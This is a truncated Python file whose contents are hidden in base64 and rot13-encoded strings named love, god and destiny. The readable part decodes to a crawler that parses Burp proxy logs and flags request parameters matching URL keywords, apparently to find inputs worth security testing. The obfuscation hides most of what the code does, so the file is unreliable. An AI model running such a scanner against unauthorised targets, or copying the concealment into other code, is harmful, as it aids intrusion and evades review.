love = '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'
god = 'X3VybD0gcmUuZmluZGFsbCgiKFw/fFwmKShbXj1dKylcPShbXiZdKykiLGxpbmtVcmwpCgkJCQlnZXRfcmVxPWxpbmtVcmwucnNwbGl0KCc/JywxKQoJCQkJdXJsPWdldF9yZXFbMF0KCQkJCXBhcmFtZXRlcnM9Z2V0X3JlcVsxXQoKCQkJCWlmIHBvc3QgYW5kIHVybCBub3QgaW4gcG9zdF90aHJvd0F3YXlHZXRSZXFzOgoJCQkJCXBvc3RfdGhyb3dBd2F5R2V0UmVxc1t1cmxdPXBhcmFtZXRlcnMKCQkJCWVsaWYgbm90IHBvc3QgYW5kIHVybCBub3QgaW4gZ2V0X3Rocm93QXdheUdldFJlcXM6CgkJCQkJZ2V0X3Rocm93QXdheUdldFJlcXNbdXJsXT1wYXJhbWV0ZXJzCgkJCQllbHNlOgoJCQkJCWlmIHBvc3Q6CgkJCQkJCWV4aXN0aW5nUGFyYW1zPXBvc3RfdGhyb3dBd2F5R2V0UmVxc1t1cmxdCgkJCQkJZWxzZToKCQkJCQkJZXhpc3RpbmdQYXJhbXM9Z2V0X3Rocm93QXdheUdldFJlcXNbdXJsXQoKCQkJCQlhbGxQYXJhbWV0ZXJFeGlzdHMgPSBGYWxzZQoJCQkJCWZvciBwYXJhbXMgaW4gY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmw6CgkJCQkJCQkjU29tZSBwYXJhbSBuYW1lcyBoYXZlIHNwZWNpYWwgY2hhcnMgd2UgbmVlZCB0byBlc2NhcGUgdGhlbSBhbmQgdGhlbiBzZWFyY2gKCQkJCQkJCWZvcm1pbmdSZWdleD1yZS5lc2NhcGUocGFyYW1zWzFdKQoJCQkJCQkJaWYgcmUuc2VhcmNoKGZvcm1pbmdSZWdleCxleGlzdGluZ1BhcmFtcyxyZS5JKToKCQkJCQkJCQkJYWxsUGFyYW1ldGVyRXhpc3RzPVRydWUKCQkJCQkJCWVsc2U6CgkJCQkJCQkJCWFsbFBhcmFtZXRlckV4aXN0cz1GYWxzZQoJCQkJCWlmIGFsbFBhcmFtZXRlckV4aXN0czoKCQkJCQkJCXFfYnVycC50YXNrX2RvbmUoKQoJCQkJCQkJY29udGludWUKCQkJCQllbHNlOgoJCQkJCQlpZiBwb3N0OgoJCQkJCQkJcG9zdF90aHJvd0F3YXlHZXRSZXFzW3VybF09cGFyYW1ldGVycwoJCQkJCQllbHNlOgoJCQkJCQkJZ2V0X3Rocm93QXdheUdldFJlcXNbdXJsXT1wYXJhbWV0ZXJzCgkJCSNBY3R1YWwgUHJvY2Vzc2luZyBvZiByZXF1ZXN0cyBzdGFydHMsIGp1c3QgY2hlY2tpbmcgZm9yIDIwMCBzdGF0dXMJCQkJCgkJCWlmIGl0ZW0uZmluZCgnc3RhdHVzJykudGV4dD09IjIwMCIgYW5kIGl0ZW0uZmluZCgnbWV0aG9kJykudGV4dD09IlBPU1QiOgoJCQkJI1NwZWNpYWwgY29uZGl0aW9uIGZvciBoYW5kbGluZyBVUkwgcGFyYW1ldGVycyBpbiBwb3N0IHJlcXVlc3QgdG8gc2VuZCB0aGVtIAoJCQkJaWYgIj8iIGluIGxpbmtVcmw6CgkJCQkJY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmw9IHJlLmZpbmRhbGwoIihcP3xcJikoW149XSspXD0oW14mXSspIixsaW5rVXJsKQoKCQkJCQkjQ2hlY2tpbmcgaWYgdGhlcmUgaXMgYSBwYXJhbWF0ZXIgaW4gdGhlIFVSTCAoVGhpcyB3b3VsZCBmaWx0ZXIgcmVzdCBBUElzIGluIHRoZSBmb3JtYXQgL3Rlc3QvMSAvdGVzdC8yKQoJCQkJCWlmIG5vdCBsZW4oY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmwpPT0wOgoJCQkJCQkjR2V0dGluZyB0aGUgcGFyYW0gdmFsdWVzIHBhcmFtc1syXSBhbmQgcGFyYW0gbmFtZSBwYXJhbXNbMV0gYW5kIG1hdGNoaW5nIGFnYWluc3QgcmVnZXgKCQkJCQkJZm9yIHBhcmFtcyBpbiBjaGVja2luZ19wYXJhbXNfZm9yX3VybDoKCQkJCQkJCW1hdGNoVVJMS2V5d29yZHNJbk5hbWUoIlBPU1QiLHBhcmFtc1sxXSxsaW5rVXJsKQoJCQkJCQkJbWF0Y2hVUkxQYXR0ZXJuSW5WYWx1ZSgiUE9TVCIscGFyYW1zWzFdLHBhcmFtc1syXSxsaW5rVXJsKQoKCQkJCXJlc3BvbnNlPWJhc2U2NC5iNjRkZWNvZGUoaXRlbS5maW5kKCdyZXF1ZXN0JykudGV4dCkuZGVjb2RlKCJ1dGY4IikKCQkJCWNvbnRlbnRfdHlwZV9yZWdleD0nXFxyXFxuQ29udGVudC1UeXBlOiguKj8pXFxyXFxuJwoJCQkJaWYgcmUuc2VhcmNoKGNvbnRlbnRfdHlwZV9yZWdleCxyZXNwb25zZSk6CgkJCQkJY29udGVudF90eXBlID0gKHJlLnNlYXJjaChjb250ZW50X3R5cGVfcmVnZXgscmVzcG9uc2UpLmdyb3VwKDEpKQoKCQkJCWlmICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIGluIGNvbnRlbnRfdHlwZToKCQkJCQlmb3JtX3JlZ2V4PSdcXHJcXG5cXHJcXG4oLiopJwoJCQkJCXJlc3BvbnNlPXVybGxpYi5wYXJzZS51bnF1b3RlKHJlc3BvbnNlKQoJCQkJCWlmIHJlLnNlYXJjaChmb3JtX3JlZ2V4LHJlc3BvbnNlKToKCQkJCQkJZm9ybV9yZXE9cmUuc2VhcmNoKGZvcm1fcmVnZXgscmVzcG9uc2UpLmdyb3VwKDEpCgkJCQkJCWNoZWNraW5nX3BhcmFtc19mb3JfdXJsPSByZS5maW5kYWxsKCIoXCYpPyhbXj1dKylcPShbXiZdKykiLGZvcm1fcmVxKQoJCQkJCQkgI0NoZWNraW5nIGlmIHRoZXJlIGlzIGEgcGFyYW1hdGVyIGluIHRoZSBVUkwgKFRoaXMgd291bGQgZmlsdGVyIHJlc3QgQVBJcyBpbiB0aGUgZm9ybWF0IC90ZXN0LzEgL3Rlc3QvMikKCQkJCQkJaWYgbm90IGxlbihjaGVja2luZ19wYXJhbXNfZm9yX3VybCk9PTA6CgkJCQkJCQkjR2V0dGluZyB0aGUgcGFyYW0gdmFsdWVzIHBhcmFtc1syXSBhbmQgcGFyYW0gbmFtZSBwYXJhbXNbMV0gYW5kIG1hdGNoaW5nIGFnYWluc3QgcmVnZXgKCQkJCQkJCWZvciBwYXJhbXMgaW4gY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmw6CgkJCQkJCQkJI3ByaW50IChwYXJhbXNbMV0pCgkJCQkJCQkJYnVycF9tYXRjaFVSTEtleXdvcmRzSW5OYW1lKCJQT1NUIixwYXJhbXNbMV0sbGlua1VybCkKCQkJCQkJCQlidXJwX21hdGNoVVJMUGF0dGVybkluVmFsdWUoIlBPU1QiLHBhcmFtc1sxXSxwYXJhbXNbMl0sbGlua1VybCkKCQkJCWVsaWYgImpzb24iIGluIGNvbnRlbnRfdHlwZToKCQkJCQkjcHJpbnQgKHVybGxpYi5wYXJzZS51bnF1b3RlKHJlc3BvbnNlKSkKCQkJCQlqc29uX3JlZ2V4PSdcXHJcXG5cXHJcXG4oeygufFxuKSp9KScKCQkJCQlpZiByZS5zZWFyY2goanNvbl9yZWdleCxyZXNwb25zZSk6CgkJCQkJCWpzb25fcmVxPXVybGxpYi5wYXJzZS51bnF1b3RlKHJlLnNlYXJjaChqc29uX3JlZ2V4LHJlc3BvbnNlKS5ncm91cCgxKSkKCQkJCQkJI3ByaW50IChqc29uX3JlcSkKCQkJCQkJanNvbl9yZXE9anNvbl9yZXEucmVwbGFjZSgnXG4nLCAnJykucmVwbGFjZSgnXHInLCAnJykKCQkJCQkJZm9yIGtleSx2YWx1ZSBpbiBqc29uLmxvYWRzKGpzb25fcmVxKS5pdGVtcygpOgoJCQkJCQkJYnVycF9tYXRjaFVSTEtleXdvcmRzSW5OYW1lKCJQT1NUIixrZXksbGlua1VybCkKCQkJCQkJCWJ1cnBfbWF0Y2hVUkxQYXR0ZXJuSW5WYWx1ZSgiUE9TVCIsa2V5LHZhbHVlLGxpbmtVcmwpCgkJCQkjVE9ETwoJCQkJZWxpZiAieG1sIiBpbiBjb250ZW50X3R5cGU6CgkJCQkJcHJpbnQgKCIiKQoKCQkJZWxpZiBpdGVtLmZpbmQoJ3N0YXR1cycpLnRleHQ9PSIyMDAiIGFuZCBpdGVtLmZpbmQoJ21ldGhvZCcpLnRleHQ9PSJHRVQiOgoJCQkJY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmw9IHJlLmZpbmRhbGwoIihcP3xcJikoW149XSspXD0oW14mXSspIixsaW5rVXJsKQoKCQkJCSNDaGVja2luZyBpZiB0aGVyZSBpcyBhIHBhcmFtYXRlciBpbiB0aGUgVVJMIChUaGlzIHdvdWxkIGZpbHRlciByZXN0IEFQSXMgaW4gdGhlIGZvcm1hdCAvdGVzdC8xIC90ZXN0LzIpCgkJCQlpZiBub3QgbGVuKGNoZWNraW5nX3BhcmFtc19mb3JfdXJsKT09MDoKCQkJCQkjR2V0dGluZyB0aGUgcGFyYW0gdmFsdWVzIHBhcmFtc1syXSBhbmQgcGFyYW0gbmFtZSBwYXJhbXNbMV0gYW5kIG1hdGNoaW5nIGFnYWluc3QgcmVnZXgKCQkJCQlmb3IgcGFyYW1zIGluIGNoZWNraW5nX3BhcmFtc19mb3JfdXJsOgoJCQkJCQlidXJwX21hdGNoVVJMS2V5d29yZHNJbk5hbWUoIkdFVCIscGFyYW1zWzFdLGxpbmtVcmwpCgkJCQkJCWJ1cnBfbWF0Y2hVUkxQYXR0ZXJuSW5WYWx1ZSgiR0VUIixwYXJhbXNbMV0scGFyYW1zWzJdLGxpbmtVcmwpCgkJCQkKCQkJCSNBZGRpbmcgdGhlIGxpbmsgZm91bmQgdG8gZG8gYmFzaWMgY3Jhd2xpbmcgdG8gZ2V0IG1heGltdW0gcmVzdWx0cwoJCQkJcS5wdXQobGlua1VybCkKCQkJcV9idXJwLnRhc2tfZG9uZSgpCgkJZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgoJCQlwcmludChlKQoJCQlxX2J1cnAudGFza19kb25lKCkKCQkJY29udGludWUKCQkJCmRlZiBiYXNpY0NyYXdsaW5nKHVybCk6CglpZiBhcmdzLmNvb2tpZXM6CgkJciA9IHJlcXVlc3RzLmdldCh1cmwsIGNvb2tpZXM9Y29va2llc0RpY3QpCgllbHNlOgoJCXIgPSByZXF1ZXN0cy5nZXQodXJsKQoJc2l0ZUNvbnRlbnQ9ci50ZXh0CglpZiB1cmwgbm90IGluIGxpbmtzVmlzaXRlZDoKCQljaGVja0Zvcm1QYXJhbWV0ZXJzKHNpdGVDb250ZW50LHVybCkKCQljaGVja0ZvckdldFJlcXVlc3QodXJsKQoJCWxpbmtzVmlzaXRlZC5hZGQodXJsKQoJCQkKCQlmb3IgbGlua3MgaW4gQmVhdXRpZn'
destiny = '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